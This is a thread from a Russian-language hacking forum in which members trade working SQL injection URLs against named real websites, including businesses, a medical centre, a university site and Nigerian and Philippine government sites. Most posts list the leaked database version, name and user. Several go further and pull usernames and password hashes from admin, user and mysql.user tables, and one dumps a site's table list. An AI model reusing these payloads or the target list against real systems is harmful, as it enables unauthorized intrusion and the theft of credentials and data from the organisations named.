SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Тoсненский Телекоммуникационный Центр:

    Code:
    http://www.tosnotelecom.ru/index.php?nomer=-1'+union+select+1,2,3,4,5,[b]6[/b],7,8,9,10,11,12,13,14/*
    Version: 5.0.45-log
    Database: ttc
    User: root@localhost
     
  2. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Мед. центр Альтермед:

    Code:
    http://www.altermed.ru/index.php?nomer=-1'+union+select+1,2,3,4,[b]5[/b],[b]6[/b],7,8,9,10,11,[b]12[/b],13,14,15/*
    Version: 4.1.22-lk-log
    Database: altermed_new
    User: altermed_new@localhost
     
  3. Roston

    Roston Elder - Старейшина

    Joined:
    31 Jul 2008
    Messages:
    337
    Likes Received:
    104
    Reputations:
    8
    Code:
    http://wwh.nsys.by/vis.php?id=-1'+union+select+1,2,3,4,concat_ws(0x203B20,user(),database(),version()),6+--+
    user: [email protected]
    database: photounion_by
    version: 5.0.45-log
     
    5 people like this.
  4. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    Code:
    http://www.tele.ucl.ac.be/musics/news.php?view=item&id=-97070019+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9--
    5.0.24a-Debian_9ubuntu2.4-log:musics:musics@localhost

    and...

    Code:
    http://www.tele.ucl.ac.be/musics/news.php?view=item&id=-97070019+union+select+1,unhex(hex(concat_ws(0x3a,username,password))),3,4,5,6,7,8,9+from+tele.auth_user_md5-- 
     
    #10984 547, 29 Oct 2009
    Last edited: 29 Oct 2009
    2 people like this.
  5. onbka

    onbka Member

    Joined:
    29 Oct 2009
    Messages:
    8
    Likes Received:
    7
    Reputations:
    0
    u_newhorizon@localhost
    newhorizons
    5.0.51a-24+lenny2-log
     
  6. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    http://www.tele.ucl.ac.be/musics/news.php?view=item&id=-97070019+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9--

    usrmcv@localhost:fmcr:5.1.36-0.dotdeb.0
     
    1 person likes this.
  7. ^YaHoo^

    ^YaHoo^ Banned

    Joined:
    2 Jan 2009
    Messages:
    22
    Likes Received:
    26
    Reputations:
    0
    Code:
    http://www.iase.ru/objects.php?group=1/**/union/**/select/**/concat_ws(0x3a,version(),user(),database())/*
    5.0.45:iase@localhost:iase

    Code:
    http://www.newfazenda.ru/user/about.php?id=-1/**/union/**/select/**/concat_ws(0x3a,version(),user(),database())
    5.0.75:[email protected]:novysvetru_fazend

    Code:
    http://www.teplo-spb.ru/catalog?id=48&maker=-1/**/union/**/select/**/1,2,3,4,concat_ws(0x3a,user%20(),database(),version()),6,7,8,9,10,11,12/*
    teplospbru@localhost:teplospbru:5.0.26-lk-log
     
    1 person likes this.
  8. crazy~driver

    crazy~driver Member

    Joined:
    21 Dec 2008
    Messages:
    97
    Likes Received:
    14
    Reputations:
    4
    скуля

    http://www.sportscow.com/scoreboard.php?yid=0910&sport=101+and+1=2+union+select+version()%20#


    http://www.craigolsonsports.com/feature.php?fid=8+and+1=2+union+select+COLUMN_NAME,2,3+from+information_schema.COLUMNS+where+TABLE_NAME=0x7573657273+--+
     
    2 people like this.
  9. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.autore.biz/content.php?id=6+UNION+SELECT+1,2+LIMIT+1,1

    Database Version: 4.1.14
    Database name: autoredb
    User name: autore@localhost
    mysql.user found in DB


    http://www.dieselchiptuning.biz/pages/content.php?id=3+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13

    Database Version: 5.0.22
    Database name: beena
    User name: beena@localhost
    таблицы
    Code:
    16 :In database beena found table aantekening
    17 :In database beena found table abbreviations
    18 :In database beena found table bedrijf
    19 :In database beena found table bedrijfsgegevens
    20 :In database beena found table budget
    21 :In database beena found table contacten
    22 :In database beena found table contactpersonen
    23 :In database beena found table contactpersonen_old
    24 :In database beena found table credits
    25 :In database beena found table customers
    26 :In database beena found table dct_email
    27 :In database beena found table dealers
    28 :In database beena found table emailadressen
    29 :In database beena found table errormail
    30 :In database beena found table logging
    31 :In database beena found table mailinglist
    32 :In database beena found table mailinglist_copy
    33 :In database beena found table nieuwsbrief
    34 :In database beena found table nieuwsbrief_copy
    35 :In database beena found table nieuwsbrief_item
    36 :In database beena found table onderdelen
    37 :In database beena found table order_lost
    38 :In database beena found table paragraaf
    39 :In database beena found table product_type
    40 :In database beena found table producten
    41 :In database beena found table productgroepen
    42 :In database beena found table sectoren
    43 :In database beena found table shop_item
    44 :In database beena found table shop_orders
    45 :In database beena found table talen
    46 :In database beena found table tips
    47 :In database beena found table typen
    48 :In database beena found table userrights
    49 :In database beena found table vaste_teksten
    50 :In database beena found table visitors
    51 :In database beena found table voertuigen
    52 :In database beena found table voertuigen_copy
    53 :In database beena found table voertuigen_copy_copy
    54 :In database beena found table voertuigen_old
    
     
    #10989 Rubaka, 30 Oct 2009
    Last edited: 30 Oct 2009
    3 people like this.
  10. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    The B.O.S.S. Board:

    Code:
    http://www.thebossboard.com/article.php?newid=-1+union+select+[b]1[/b],2,[b]3[/b],4,[b]5[/b],[b]6[/b]--
    DB Version: 4.1.22-max-log
    DB name: bossboard
    DB user: [email protected]

    Code:
    http://dl.game.21cn.com/list.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
    Version: 4.0.20-log
    Database: pise
    User: [email protected]
     
    #10990 keng, 30 Oct 2009
    Last edited by a moderator: 30 Oct 2009
    2 people like this.
  11. ^YaHoo^

    ^YaHoo^ Banned

    Joined:
    2 Jan 2009
    Messages:
    22
    Likes Received:
    26
    Reputations:
    0
    Code:
    http://www.gangotri.ru/cs?action=itemd&itid=-960+union+select+concat_ws(0x3a,user(),database(),version())--
    b2005321_1@localhost:2005321_1:5.0.51-log- в исходнике

    Code:
    http://www.muscul.ru/article.php?id=-8/**/union/**/select/**/1,2,user(),version(),5,6,7,8,9/*
    musculr4_first@localhost 4.1.25-log

    Code:
    http://www.watches.ru/index.php?page=30&art=1/**/union/**/select/**/concat_ws(0x3a,user(),database(),version())/*
    lukonin@localhost:newwatches:4.1.25
     
  12. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    Code:
    http://www.ukrlogistica.com.ua/news.php?id=-370+union+select+1,2,concat_ws(0x3a,database(),user(),version()),4,5,6--
    jstudio_test:jstudio_Si@localhost:4.1.22-standard-log

    Code:
    http://www.e-portal.com.ua/news.php?id=-8+union+select+1,group_concat(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13--
    :[email protected]_db5.0.51a-log
     
    #10992 547, 30 Oct 2009
    Last edited: 30 Oct 2009
    1 person likes this.
  13. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    Студия 3Dform
    Code:
    http://3dform.ru/?lg=se&a=portfolio&project=37&id_service=7&id=229%20union%20select%201,2,3,4,5,6,concat_ws%280x3a,nikname,password%29,8,9,10,11,12%20from%20user%20--
    a7489_2:[email protected]:5.0.75-percona-highperf-b11-log
     
    1 person likes this.
  14. min7

    min7 Elder - Старейшина

    Joined:
    3 Sep 2005
    Messages:
    117
    Likes Received:
    85
    Reputations:
    11
    Пр:4
    Code:
    http://[COLOR=Green]apiexchange.com[/COLOR]/index_main.php?id=8&idz=-16+union+select+1,2,3,4,5,6,7,8,9,10,11--
    Database Version: 4.0.20
    Database name: api
    User name: apiconnect2@localhost
    Code:
    http://[COLOR=Green]apiexchange.com[/COLOR]/index_main.php?id=8&idz=-16+union+select+1,concat_ws(char(58),user,password),3,4,5,6,7,8,9,10,11+from+mysql.user+limit+0,1--
     
    2 people like this.
  15. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    Студия Граф, создание и продвижение сайтов
    Code:
    http://www.7ae.ru/portfolio.php?id=-72%27%20union%20select%201,2,3,4,group_concat%280x3a,user%28%29,database%28%29,version%28%29%29/*
    Version:5.0.26-log
    Database:grafrru_7ae
    user:grafrru_7ae@localhost
     
    1 person likes this.
  16. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Охрана труда и промышленная медицина:

    Code:
    http://okhranatruda.ru/view_page.php?page=-1+union+select+1,2,3,4,5,6,7,8,9--
    Version: 4.1.25-log
    Database: aeropho6_okhrana
    User: aeropho6_odmin@localhost
    Выводимые поля: 2, 5.
    Доступ к mysql.user: Нет.
     
    1 person likes this.
  17. -JC-

    -JC- Member

    Joined:
    10 Mar 2009
    Messages:
    54
    Likes Received:
    18
    Reputations:
    11
    Code:
    http://www.templariusze.org/artykuly.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+--+
     
    1 person likes this.
  18. H1Z

    H1Z Elder - Старейшина

    Joined:
    23 Mar 2007
    Messages:
    103
    Likes Received:
    61
    Reputations:
    6
    HostiaWeb.Com - High End Shared, Reseller and Dedicated Web Hosting
    Version: 5.1.37
    Database: hostw_news
    User: hostw_news@localhost

    P.S. не работает when в запросах =/
     
    #10998 H1Z, 31 Oct 2009
    Last edited: 31 Oct 2009
    4 people like this.
  19. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    http://www.nlrc.gov.ng/publications.php?id=4+union+select+1,concat_ws(0x3a,id,username,password),3,4,5,6,7+from+adminlogin--
    id:username:password

    ==========================
    http://www.hudcc.gov.ph/index.php?p=88&type=2&sec=29&aid=-4+union+select+1,group_concat(0x0b,column_name)+from+information_schema.columns+where+table_name=0x61646D696E6973747261746F7273

    http://www.hudcc.gov.ph/index.php?p=88&type=2&sec=29&aid=-4+union+select+1,group_concat(0x0b,email,0x3a,name,0x3a,pass)+from+administrators
     
    #10999 Bb0y, 31 Oct 2009
    Last edited by a moderator: 31 Oct 2009
    3 people like this.
  20. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Словарь Даля онлайн:

    Code:
    http://slovardalja.net/word.php?wordid=-1+union+select+1,2,3--
    Version: 5.0.81-community-log
    Database: slovarda_daldictionary
    User: slovarda_daluser@localhost
    Выводимые поля: 2,3.
    Доступ к mysql.user: Нет.

    ABBYY Lingvo:

    Code:
    http://www.lingvo.ru/lingvox3/?id=1+or+1=@@version--
    Version: Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: )
    Database: Publishing
    User: publishing

    jokester: Объединяй посты КНОПКА EDIT ===>>
     
    #11000 keng, 31 Oct 2009
    Last edited by a moderator: 31 Oct 2009
Thread Status:
Not open for further replies.